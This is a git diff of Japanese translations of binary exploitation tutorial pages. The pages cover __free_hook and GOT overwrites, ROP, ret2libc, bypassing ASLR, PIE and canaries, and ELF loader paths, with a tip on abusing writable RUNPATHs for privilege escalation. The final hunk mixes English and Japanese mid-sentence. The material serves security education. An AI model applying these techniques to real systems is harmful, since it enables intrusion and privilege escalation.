[https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md)。 ## Free Hook @@ -25,7 +25,7 @@ One Gadgetに関する詳細は以下を参照してください: ../libc-heap/unsorted-bin-attack.md {{#endref}} -バイナリにシンボルがある場合、次のコマンドで `__free_hook` のアドレスを見つけることができます: +バイナリにシンボルがある場合、次のコマンドで`__free_hook`のアドレスを見つけることができます: ```bash gef➤ p &__free_hook ``` @@ -43,7 +43,7 @@ gef➤ p &__free_hook 0xf75deddd : jne 0xf75dee50 -前述のコードのブレークポイントで、`$eax`にはフリーフックのアドレスが格納されます。 +前述のコードのブレークポイントで、$eaxにはフリーフックのアドレスが格納されます。 次に、**ファストビン攻撃**が実行されます: @@ -71,12 +71,12 @@ glibc 2.32は**Safe-Linking**を導入しました。これは、**tcache**お #define PROTECT_PTR(pos, ptr) (((size_t)(pos) >> 12) ^ (size_t)(ptr)) #define REVEAL_PTR(ptr) PROTECT_PTR(&ptr, ptr) ``` -悪用の結果: +悪用の結果: 1. **heap leak** は必須です - 攻撃者は有効な難読化ポインタを作成するために `chunk_addr >> 12` のランタイム値を知っている必要があります。 -2. *完全な* 8バイトポインタのみが偽造可能です; 単一バイトの部分上書きはチェックを通過しません。 +2. *完全な* 8バイトポインタのみが偽造可能であり、1バイトの部分的な上書きはチェックを通過しません。 -したがって、glibc 2.32/2.33で `__free_hook` を上書きする最小のtcache-poisoningプリミティブは次のようになります: +したがって、glibc 2.32/2.33で `__free_hook` を上書きする最小のtcache-poisoningプリミティブは次のようになります: ```py from pwn import * diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index dbd8ae6e4..38267bedb 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -6,7 +6,7 @@ ### **GOT: グローバルオフセットテーブル** -**グローバルオフセットテーブル (GOT)** は、動的リンクバイナリで外部関数の**アドレスを管理するために使用されるメカニズム**です。これらの**アドレスは実行時まで知られない**ため(動的リンクのため)、GOTは**これらの外部シンボルのアドレスを動的に更新する方法**を提供します。 +**グローバルオフセットテーブル (GOT)** は、動的リンクされたバイナリで外部関数の**アドレスを管理するために使用されるメカニズム**です。これらの**アドレスは実行時まで知られないため**(動的リンクのため)、GOTはこれらの外部シンボルのアドレスを解決した後に**動的に更新する方法を提供します**。 GOTの各エントリは、バイナリが呼び出す可能性のある外部ライブラリのシンボルに対応しています。**関数が最初に呼び出されると、その実際のアドレスは動的リンカーによって解決され、GOTに格納されます**。同じ関数への後続の呼び出しは、GOTに格納されたアドレスを使用し、再度アドレスを解決するオーバーヘッドを回避します。 @@ -14,7 +14,7 @@ GOTの各エントリは、バイナリが呼び出す可能性のある外部 **プロシージャリンクテーブル (PLT)** はGOTと密接に連携し、外部関数への呼び出しを処理するためのトランポリンとして機能します。バイナリが**外部関数を初めて呼び出すと、制御はその関数に関連付けられたPLTのエントリに渡されます**。このPLTエントリは、関数のアドレスがまだ解決されていない場合、動的リンカーを呼び出してアドレスを解決する責任があります。アドレスが解決された後、それは**GOT**に格納されます。 -**したがって、** GOTエントリは外部関数または変数のアドレスが解決された後に直接使用されます。**PLTエントリは、動的リンカーを介してこれらのアドレスの初期解決を促進するために使用されます。** +**したがって、** 外部関数または変数のアドレスが解決されると、GOTエントリは直接使用されます。**PLTエントリは、動的リンカーを介してこれらのアドレスの初期解決を促進するために使用されます**。 ## 実行を取得 @@ -24,29 +24,29 @@ GOTテーブルのアドレスを取得するには: **`objdump -s -j .got ./exe ![](<../../images/image (121).png>) -GEFで**実行可能ファイルを読み込んだ後、GOTにある** **関数**を**見ることができます**: `gef➤ x/20x 0xADDR_GOT` +GEFで**実行可能ファイルを読み込んだ後、GOTにある** **関数を** **見ることができます**: `gef➤ x/20x 0xADDR_GOT` -![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) +![](<../../images/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>) -GEFを使用して**デバッグ**セッションを**開始**し、**`got`**を実行してGOTテーブルを表示できます: +GEFを使用して**デバッグセッションを開始**し、**`got`**を実行してGOTテーブルを表示できます: ![](<../../images/image (496).png>) ### GOT2Exec -バイナリ内のGOTには、**関数のアドレスまたは** **PLT**セクションのアドレスが含まれています。この任意の書き込みの目的は、後で実行される関数の**GOTエントリを上書きすること**です。例えば、**`system`** **関数**のPLTの**アドレス**で上書きします。 +バイナリ内のGOTには、**関数のアドレスまたは** **PLTセクションのアドレスが含まれており、関数アドレスを読み込むことになります**。この任意の書き込みの目標は、**後で実行される関数のGOTエントリを** **`system`** **関数のPLTのアドレスで上書きすることです**。 -理想的には、**あなたが制御するパラメータで呼び出される関数のGOTを上書きすることになります**(これにより、system関数に送信されるパラメータを制御できるようになります)。 +理想的には、**あなたが制御するパラメータで呼び出される関数のGOTを上書きすることになります**(これにより、system関数に送信されるパラメータを制御できます)。 -もし**`system`** **がバイナリで使用されていない場合、system関数はPLTにエントリを持ちません**。このシナリオでは、最初に`system`関数のアドレスを**リーク**し、その後GOTをこのアドレスを指すように上書きする必要があります。 +もし**`system`** **がバイナリで使用されていない場合、system関数はPLTにエントリを持ちません**。このシナリオでは、最初に`system`関数のアドレスを漏洩させ、その後GOTをこのアドレスを指すように上書きする必要があります。 PLTアドレスは**`objdump -j .plt -d ./vuln_binary`**で確認できます。 ## libc GOTエントリ -**libcのGOT**は通常、**部分的RELRO**でコンパイルされており、そのアドレスを特定できれば良いターゲットになります([**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html))。 +**libcのGOT**は通常、**部分的RELRO**でコンパイルされており、そのアドレスを特定することができれば、良いターゲットになります([**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html))。 -libcの一般的な関数は、**他の内部関数**を呼び出すことがあり、そのGOTはコード実行を得るために上書きされる可能性があります。 +libcの一般的な関数は、**他の内部関数を呼び出す**ことがあり、そのGOTはコード実行を得るために上書きされる可能性があります。 [**この技術に関する詳細情報はこちら**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)を参照してください。 @@ -62,20 +62,22 @@ libcの一般的な関数は、**他の内部関数**を呼び出すことがあ ## **One Gadget** + {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} -## **ヒープからGOTを悪用する** +## **ヒープからのGOTの悪用** -ヒープの脆弱性からRCEを取得する一般的な方法は、ファストビンを悪用することです。これにより、GOTテーブルの一部をファストビンに追加できるため、そのチャンクが割り当てられると、**通常は`free`の関数ポインタを上書きすることが可能になります**。\ +ヒープの脆弱性からRCEを取得する一般的な方法は、ファストビンを悪用することです。これにより、GOTテーブルの一部をファストビンに追加できるため、そのチャンクが割り当てられると、**通常は`free`のポインタを上書きすることが可能になります**。\ その後、`free`を`system`に指し、`/bin/sh\x00`が書き込まれたチャンクを解放すると、シェルが実行されます。 [**ここに例があります**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk_extend_overlapping/#hitcon-trainging-lab13)**。** ## **保護** -**フルRELRO**保護は、この種の技術から保護するために、バイナリが起動されるときにすべての関数のアドレスを解決し、その後**GOTテーブルを読み取り専用**にすることを目的としています。 +**フルRELRO**保護は、この種の技術に対抗するために、バイナリが起動されるときにすべての関数のアドレスを解決し、その後**GOTテーブルを読み取り専用にすることを目的としています**: + {{#ref}} ../common-binary-protections-and-bypasses/relro.md diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index 88bf17e1f..6a6497fe7 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md @@ -4,7 +4,7 @@ ## ELFの基本情報 -何かをエクスプロイトする前に、**ELFバイナリ**の構造の一部を理解することが興味深いです: +何かをエクスプロイトする前に、**ELFバイナリ**の構造の一部を理解することは興味深いです: {{#ref}} elf-tricks.md @@ -24,11 +24,11 @@ tools/ プログラムのフローを制御する方法はいくつかあります: -- [**スタックオーバーフロー**](../stack-overflow/index.html)によってスタックからリターンポインタを上書きするか、EBP -> ESP -> EIPを操作します。 +- [**スタックオーバーフロー**](../stack-overflow/index.html)によってスタックからリターンポインタやEBP -> ESP -> EIPを上書きする。 - オーバーフローを引き起こすために[**整数オーバーフロー**](../integer-overflow.md)を悪用する必要があるかもしれません。 - または**任意の書き込み + 実行への書き込み**を介して。 -- [**フォーマット文字列**](../format-strings/index.html)**:** `printf`を悪用して任意の内容を任意のアドレスに書き込みます。 -- [**配列インデクシング**](../array-indexing.md): 不適切に設計されたインデクシングを悪用して、いくつかの配列を制御し、任意の書き込みを取得します。 +- [**フォーマット文字列**](../format-strings/index.html)**:** `printf`を悪用して任意の内容を任意のアドレスに書き込む。 +- [**配列インデクシング**](../array-indexing.md): 不適切に設計されたインデクシングを悪用して、いくつかの配列を制御し、任意の書き込みを得る。 - オーバーフローを引き起こすために[**整数オーバーフロー**](../integer-overflow.md)を悪用する必要があるかもしれません。 - **bofからWWWへのROP**: バッファオーバーフローを悪用してROPを構築し、WWWを取得できるようにします。 @@ -42,70 +42,70 @@ tools/ 考慮すべきことは、通常**脆弱性の1回のエクスプロイトでは不十分な場合がある**ということです。特にいくつかの保護を回避する必要があります。したがって、**単一の脆弱性を同じバイナリの実行中に何度もエクスプロイト可能にする**いくつかのオプションを議論することは興味深いです: -- **`main`関数**のアドレスまたは**脆弱性**が発生しているアドレスをROPチェーンに書き込みます。 +- **`main`関数**のアドレスや**脆弱性**が発生しているアドレスを**ROP**チェーンに書き込む。 - 適切なROPチェーンを制御することで、そのチェーン内のすべてのアクションを実行できるかもしれません。 -- **`exit`のGOT内のアドレス**(またはバイナリが終了する前に使用する他の関数)に**脆弱性に戻る**アドレスを書き込みます。 -- [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**で説明されているように、ここに2つの関数を格納します。1つは再度脆弱性を呼び出し、もう1つは**`__libc_csu_fini`**を呼び出し、再度`.fini_array`から関数を呼び出します。 +- **`exit`のGOT内のアドレス**(またはバイナリが終了する前に使用する他の関数)に**脆弱性に戻る**アドレスを書き込む。 +- [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**で説明されているように、ここに2つの関数を格納し、1つは再度脆弱性を呼び出し、もう1つは**`__libc_csu_fini`**を呼び出して`.fini_array`から関数を再度呼び出します。 ## エクスプロイトの目標 ### 目標: 既存の関数を呼び出す -- [**ret2win**](#ret2win): フラグを取得するために呼び出す必要がある関数がコード内にあります(特定のパラメータが必要な場合があります)。 +- [**ret2win**](#ret2win): フラグを取得するために呼び出す必要があるコード内の関数(特定のパラメータが必要な場合もあります)。 - **PIE**がない**通常のbofでは**、スタックに保存されたリターンアドレスにアドレスを書き込むだけで済みます。 - [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)があるbofでは、それを回避する必要があります。 - [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html)があるbofでは、それを回避する必要があります。 - **ret2win**関数を正しく呼び出すために複数のパラメータを設定する必要がある場合は、以下を使用できます: -- すべてのパラメータを準備するための十分なガジェットがある場合は、[**ROP**](#rop-and-ret2...-techniques) **チェーン**。 +- すべてのパラメータを準備するのに十分なガジェットがある場合は、[**ROP**](#rop-and-ret2...-techniques) **チェーン**。 - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html)(このシステムコールを呼び出せる場合)を使用して多くのレジスタを制御します。 - [**ret2csu**](../rop-return-oriented-programing/ret2csu.md)および[**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md)からのガジェットを使用して複数のレジスタを制御します。 - [**Write What Where**](../arbitrary-write-2-exec/index.html)を介して、他の脆弱性(bofではない)を悪用して**`win`**関数を呼び出すことができます。 -- [**ポインタのリダイレクト**](../stack-overflow/pointer-redirecting.md): スタックに呼び出される関数へのポインタや、興味深い関数(systemまたはprintf)で使用される文字列へのポインタが含まれている場合、そのアドレスを上書きすることが可能です。 -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)または[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がアドレスに影響を与える可能性があります。 -- [**未初期化変数**](../stack-overflow/uninitialized-variables.md): あなたは決してわかりません。 +- [**ポインタのリダイレクト**](../stack-overflow/pointer-redirecting.md): スタックに呼び出される関数へのポインタや、興味のある関数(systemやprintf)で使用される文字列へのポインタが含まれている場合、そのアドレスを上書きすることが可能です。 +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)や[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がアドレスに影響を与える可能性があります。 +- [**未初期化の変数**](../stack-overflow/uninitialized-variables.md): あなたは決してわかりません。 ### 目標: RCE #### シェルコードを介して、nxが無効な場合またはシェルコードとROPを混合する場合: -- [**(スタック)シェルコード**](#stack-shellcode): これは、リターンポインタを上書きする前または後にスタックにシェルコードを格納し、次に**それにジャンプして**実行するのに役立ちます: -- **いかなる場合でも、** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/index.html)**がある場合、通常のbofではそれを回避する必要があります(リーク)**。 -- **ASLR**がない場合、**および** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md)が無効な場合、スタックのアドレスにジャンプすることが可能です。なぜなら、それは決して変わらないからです。 +- [**(スタック)シェルコード**](#stack-shellcode): これは、リターンポインタを上書きする前または後にスタックにシェルコードを格納し、**それにジャンプして**実行するのに役立ちます: +- いかなる場合でも、**canary**がある場合、通常のbofではそれを回避(リーク)する必要があります。 +- **ASLR**がない場合、**nx**がない場合、スタックのアドレスにジャンプすることが可能です。 - **ASLR**がある場合、[**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md)のような技術を使用してそこにジャンプする必要があります。 -- **nx**がある場合、いくつかの[**ROP**](../rop-return-oriented-programing/index.html)を使用して`memprotect`を呼び出し、ページを`rwx`にしてから、**そこにシェルコードを格納する**(例えばreadを呼び出す)必要があります。そして、そこにジャンプします。 +- **nx**がある場合、いくつかの[**ROP**](../rop-return-oriented-programing/index.html)を使用して`memprotect`を呼び出し、ページを`rwx`にしてから、シェルコードをそこに格納(例えばreadを呼び出す)し、そこにジャンプする必要があります。 - これはシェルコードとROPチェーンを混合します。 #### システムコールを介して - [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/index.html): 任意のコマンドを実行するために`execve`を呼び出すのに役立ちます。**特定のシステムコールをパラメータで呼び出すためのガジェットを見つける必要があります**。 -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)または[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)が有効な場合、バイナリやライブラリからROPガジェットを使用するためにそれらを打破する必要があります。 +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)や[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)が有効な場合、バイナリやライブラリからROPガジェットを使用するためにそれらを打破する必要があります。 - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/index.html)は**ret2execve**を準備するのに役立ちます。 -- [**ret2csu**](../rop-return-oriented-programing/ret2csu.md)および[**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md)からのガジェットを使用して複数のレジスタを制御します。 +- [**ret2csu**](../rop-return-oriented-programing/ret2csu.md)や[**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md)からのガジェットを使用して複数のレジスタを制御します。 #### libcを介して -- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/index.html): **`libc`**のライブラリから関数(通常は**`system`**)を呼び出すのに役立ちます。準備された引数(例:`'/bin/sh'`)を使用します。呼び出したい関数を持つライブラリを**バイナリがロードする必要があります**(通常はlibc)。 -- **静的にコンパイルされていて、** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がない場合、`system`および`/bin/sh`の**アドレス**は変わらないため、静的に使用することが可能です。 -- **ASLR**がない場合、**およびロードされたlibcのバージョンを知っている場合、`system`および`/bin/sh`の**アドレス**は変わらないため、静的に使用することが可能です。 -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)があるが[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がない場合、libcを知っていて、バイナリが`system`**関数を使用している場合、**GOT内のsystemのアドレスに**`ret`し、`'/bin/sh'`のアドレスをパラメータにすることが可能です(これを見つける必要があります)。 -- [ASLR](../common-binary-protections-and-bypasses/aslr/index.html)があり、[PIE](../common-binary-protections-and-bypasses/pie/index.html)がないが、libcを知っていて**バイナリが`system`**を使用していない場合: +- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/index.html): **`libc`**からの関数(通常は**`system`**)を呼び出すのに役立ちます。準備された引数(例:`'/bin/sh'`)を使用します。呼び出したい関数を持つライブラリを**バイナリがロードする必要があります**(通常はlibc)。 +- **静的にコンパイルされていて、PIEがない場合**、`system`と`/bin/sh`の**アドレス**は変わらないため、静的に使用することが可能です。 +- **ASLRがなく、ロードされたlibcのバージョンを知っている場合**、`system`と`/bin/sh`の**アドレス**は変わらないため、静的に使用することが可能です。 +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)があるが[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がない場合、libcを知っていて、バイナリが`system`関数を使用している場合、**GOT内のsystemのアドレスに`ret`し、`'/bin/sh'`のアドレスをパラメータにすることが可能です**(これを解決する必要があります)。 +- [ASLR](../common-binary-protections-and-bypasses/aslr/index.html)があり、[PIE](../common-binary-protections-and-bypasses/pie/index.html)がないが、バイナリが`system`を使用していない場合: - [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md)を使用して`system`のアドレスを解決し、呼び出します。 -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)を回避し、メモリ内の`system`および`'/bin/sh'`のアドレスを計算します。 -- **ASLR**があり、[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)があり、libcを知らない場合:次のことを行う必要があります: +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)を回避し、メモリ内の`system`と`'/bin/sh'`のアドレスを計算します。 +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)と[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)があり、libcを知らない場合:以下を行う必要があります: - [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)を回避します。 -- 使用されている**`libc`バージョン**を見つけます(いくつかの関数アドレスをリークします)。 -- 続行するために**ASLRを使用した以前のシナリオを確認します**。 +- 使用されている**`libc`のバージョン**を見つけます(いくつかの関数アドレスをリークします)。 +- **ASLR**の以前のシナリオを確認して続行します。 #### EBP/RBPを介して -- [**スタックピボット/EBP2Ret/EBPチェイニング**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): スタック内の保存されたEBPを介してESPを制御してRETを制御します。 +- [**スタックピボッティング / EBP2Ret / EBPチェイニング**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): スタック内の保存されたEBPを介してESPを制御してRETを制御します。 - **オフバイワン**スタックオーバーフローに役立ちます。 -- ペイロードをメモリに構築し、次にEBPを介してそれにジャンプする際にEIPを制御するための代替手段として役立ちます。 +- EIPを制御するための代替手段として、EIPを悪用してメモリ内にペイロードを構築し、EBPを介してそれにジャンプするのに役立ちます。 #### その他 -- [**ポインタのリダイレクト**](../stack-overflow/pointer-redirecting.md): スタックに呼び出される関数へのポインタや、興味深い関数(systemまたはprintf)で使用される文字列へのポインタが含まれている場合、そのアドレスを上書きすることが可能です。 -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)または[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がアドレスに影響を与える可能性があります。 -- [**未初期化変数**](../stack-overflow/uninitialized-variables.md): あなたは決してわかりません。 +- [**ポインタのリダイレクト**](../stack-overflow/pointer-redirecting.md): スタックに呼び出される関数へのポインタや、興味のある関数(systemやprintf)で使用される文字列へのポインタが含まれている場合、そのアドレスを上書きすることが可能です。 +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)や[**PIE**](../common-binary-protections-and-bypasses/pie/index.html)がアドレスに影響を与える可能性があります。 +- [**未初期化の変数**](../stack-overflow/uninitialized-variables.md): あなたは決してわかりません。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index e1c005fa1..619775fc1 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -52,9 +52,9 @@ Segment Sections... ### LOAD これらのヘッダーは**バイナリをメモリにロードする方法**を示すために使用されます。\ -各**LOAD**ヘッダーは**メモリ**の領域(サイズ、権限、アライメント)を示し、ELF **バイナリのバイトをそこにコピーする**ことを示します。 +各**LOAD**ヘッダーは**メモリ**の領域(サイズ、権限、アライメント)を示し、ELF**バイナリのバイトをそこにコピーする**ことを示します。 -例えば、2番目のものはサイズが0x1190で、0x1fc48に位置し、読み取りと書き込みの権限を持ち、オフセット0xfc48から0x528で満たされます(予約されたスペース全体は満たされません)。このメモリにはセクション`.init_array .fini_array .dynamic .got .data .bss`が含まれます。 +例えば、2番目のものはサイズが0x1190で、0x1fc48に位置し、読み取りと書き込みの権限を持ち、オフセット0xfc48から0x528で埋められます(予約されたスペース全体は埋めません)。このメモリにはセクション`.init_array .fini_array .dynamic .got .data .bss`が含まれます。 ### DYNAMIC @@ -64,7 +64,7 @@ Segment Sections... これはバイナリに関するベンダーメタデータ情報を保存します。 -- x86-64では、`readelf -n`は`.note.gnu.property`内の`GNU_PROPERTY_X86_FEATURE_1_*`フラグを表示します。`IBT`および/または`SHSTK`が表示される場合、バイナリはCET(間接分岐追跡および/またはシャドウスタック)でビルドされています。これはROP/JOPに影響を与え、間接分岐ターゲットは`ENDBR64`命令で始まり、リターンはシャドウスタックに対してチェックされます。詳細とバイパスノートについてはCETページを参照してください。 +- x86-64では、`readelf -n`が`.note.gnu.property`内の`GNU_PROPERTY_X86_FEATURE_1_*`フラグを表示します。`IBT`および/または`SHSTK`が表示される場合、バイナリはCET(間接分岐追跡および/またはシャドウスタック)でビルドされています。これはROP/JOPに影響を与え、間接分岐ターゲットは`ENDBR64`命令で始まり、リターンはシャドウスタックに対してチェックされます。詳細とバイパスノートについてはCETページを参照してください。 {{#ref}} ../common-binary-protections-and-bypasses/cet-and-shadow-stack.md @@ -76,19 +76,19 @@ Segment Sections... ### GNU_STACK -スタック実行防止防御の設定を含みます。これが有効な場合、バイナリはスタックからコードを実行できません。 +スタック実行防止防御の構成を含みます。これが有効な場合、バイナリはスタックからコードを実行できません。 - `readelf -l ./bin | grep GNU_STACK`で確認してください。テスト中に強制的に切り替えるには、`execstack -s|-c ./bin`を使用できます。 ### GNU_RELRO -バイナリのRELRO(再配置読み取り専用)設定を示します。この保護は、プログラムがロードされた後、実行を開始する前に、メモリの特定のセクション(`GOT`や`init`および`fini`テーブルなど)を読み取り専用としてマークします。 +バイナリのRELRO(再配置読み取り専用)構成を示します。この保護は、プログラムがロードされた後、実行を開始する前に、メモリの特定のセクション(`GOT`や`init`および`fini`テーブルなど)を読み取り専用としてマークします。 -前の例では、0x3b8バイトを0x1fc48に読み取り専用としてコピーし、セクション`.init_array .fini_array .dynamic .got .data .bss`に影響を与えています。 +前の例では、0x1fc48に0x3b8バイトを読み取り専用としてコピーし、セクション`.init_array .fini_array .dynamic .got .data .bss`に影響を与えています。 -RELROは部分的または完全であることに注意してください。部分的バージョンは、**遅延バインディング**に使用され、ライブラリの最初の位置が検索されるときにアドレスを書き込むために**書き込み権限**を持つ必要があるセクション**`.plt.got`**を保護しません。 +RELROは部分的または完全である可能性があり、部分的なバージョンは**`.plt.got`**セクションを保護せず、これは**レイジーバインディング**に使用され、ライブラリのアドレスを最初に検索する際にこのメモリ空間に**書き込み権限**が必要です。 -> エクスプロイト技術と最新のバイパスノートについては、専用ページを確認してください: +> 攻撃技術や最新のバイパスノートについては、専用ページを確認してください: {{#ref}} ../common-binary-protections-and-bypasses/relro.md @@ -165,8 +165,8 @@ CONTENTS, READONLY ### メタセクション -- **文字列テーブル**: ELFファイルに必要なすべての文字列を含んでいます(ただし、プログラムで実際に使用されるものは含まれていません)。例えば、`.text`や`.data`のようなセクション名が含まれています。そして、もし`.text`が文字列テーブルのオフセット45にある場合、**name**フィールドには**45**という番号が使用されます。 -- 文字列テーブルの場所を見つけるために、ELFは文字列テーブルへのポインタを含んでいます。 +- **文字列テーブル**: ELFファイルに必要なすべての文字列を含んでいます(ただし、プログラムで実際に使用されるものは含まれていません)。例えば、`.text`や`.data`のようなセクション名が含まれています。そして、もし`.text`が文字列テーブルのオフセット45にある場合、**name**フィールドには番号**45**が使用されます。 +- 文字列テーブルの位置を見つけるために、ELFは文字列テーブルへのポインタを含んでいます。 - **シンボルテーブル**: 名前(文字列テーブルのオフセット)、アドレス、サイズ、シンボルに関するその他のメタデータなど、シンボルに関する情報を含んでいます。 ### メインセクション @@ -176,7 +176,7 @@ CONTENTS, READONLY - **`.bss`**: 初期化されていないグローバル変数(またはゼロに初期化)。ここにある変数は自動的にゼロに初期化されるため、バイナリに無駄なゼロが追加されるのを防ぎます。 - **`.rodata`**: 定数グローバル変数(読み取り専用セクション)。 - **`.tdata`**および**`.tbss`**: スレッドローカル変数が使用されるときの.dataおよび.bssのようなもの(C++の`__thread_local`またはCの`__thread`)。 -- **`.dynamic`**: 下記を参照。 +- **`.dynamic`**: 以下を参照してください。 ## シンボル @@ -204,7 +204,7 @@ Num: Value Size Type Bind Vis Ndx Name 各シンボルエントリには以下が含まれます: - **名前** -- **バインディング属性**(weak, local または global):ローカルシンボルはプログラム自身によってのみアクセス可能ですが、グローバルシンボルはプログラムの外部で共有されます。weakオブジェクトは、例えば異なるもので上書き可能な関数です。 +- **バインディング属性**(weak, local または global):ローカルシンボルはプログラム自身によってのみアクセス可能ですが、グローバルシンボルはプログラムの外部で共有されます。weakオブジェクトは、例えば異なる関数によってオーバーライド可能な関数です。 - **タイプ**:NOTYPE(タイプ指定なし)、OBJECT(グローバルデータ変数)、FUNC(関数)、SECTION(セクション)、FILE(デバッガ用のソースコードファイル)、TLS(スレッドローカル変数)、GNU_IFUNC(再配置用の間接関数) - **セクション** インデックス(位置) - **値**(メモリ内のアドレス) @@ -249,28 +249,28 @@ Tag Type Name/Value 0x000000006ffffff9 (RELACOUNT) 15 0x0000000000000000 (NULL) 0x0 ``` -The NEEDEDディレクトリは、プログラムが**言及されたライブラリをロードする必要がある**ことを示しています。NEEDEDディレクトリは、共有**ライブラリが完全に動作可能で使用準備が整った**ときに完了します。 +The NEEDED directory indicates that the program **必要なライブラリを読み込む必要がある** in order to continue. The NEEDED directory completes once the shared **ライブラリが完全に動作し、使用可能になる** for use. -### ダイナミックローダーの検索順序 (RPATH/RUNPATH, $ORIGIN) +### Dynamic loader search order (RPATH/RUNPATH, $ORIGIN) -エントリ`DT_RPATH`(非推奨)および/または`DT_RUNPATH`は、ダイナミックローダーが依存関係を検索する場所に影響を与えます。おおよその順序は次のとおりです: +The entries `DT_RPATH` (deprecated) and/or `DT_RUNPATH` influence where the dynamic loader searches for dependencies. Rough order: -- `LD_LIBRARY_PATH`(setuid/sgidまたはその他の「セキュア実行」プログラムでは無視される) -- `DT_RPATH`(`DT_RUNPATH`が存在しない場合のみ) +- `LD_LIBRARY_PATH` (setuid/sgidまたはその他の「セキュア実行」プログラムでは無視される) +- `DT_RPATH` (only if `DT_RUNPATH` absent) - `DT_RUNPATH` - `ld.so.cache` -- `/lib64`、`/usr/lib64`などのデフォルトディレクトリ +- default directories like `/lib64`, `/usr/lib64`, etc. -`$ORIGIN`は、RPATH/RUNPATH内でメインオブジェクトのディレクトリを参照するために使用できます。攻撃者の視点から、これはファイルシステムのレイアウトや環境を制御する場合に重要です。ハードニングされたバイナリ(AT_SECURE)では、ほとんどの環境変数はローダーによって無視されます。 +`$ORIGIN` can be used inside RPATH/RUNPATH to refer to the directory of the main object. From an attacker perspective this matters when you control the filesystem layout or environment. For hardened binaries (AT_SECURE) most environment variables are ignored by the loader. -- 検査コマンド:`readelf -d ./bin | egrep -i 'r(path|unpath)'` -- クイックテスト:`LD_DEBUG=libs ./bin 2>&1 | grep -i find`(検索パスの決定を表示) +- Inspect with: `readelf -d ./bin | egrep -i 'r(path|unpath)'` +- Quick test: `LD_DEBUG=libs ./bin 2>&1 | grep -i find` (shows search path decisions) -> Priv-escのヒント:あなたが所有する書き込み可能なRUNPATHや誤設定された`$ORIGIN`相対パスを悪用することを好むべきです。LD_PRELOAD/LD_AUDITはセキュア実行(setuid)コンテキストでは無視されます。 +> Priv-esc tip: Prefer abusing writable RUNPATHs or misconfigured `$ORIGIN`-relative paths owned by you. LD_PRELOAD/LD_AUDIT are ignored in secure-execution (setuid) contexts. -## 再配置 +## Relocations -ローダーは、依存関係をロードした後にそれらを再配置する必要があります。これらの再配置は、RELまたはRELA形式の再配置テーブルに示され、再配置の数は動的セクションのRELSZまたはRELASZに示されます。 +The loader also must relocate dependencies after having loaded them. These relocations 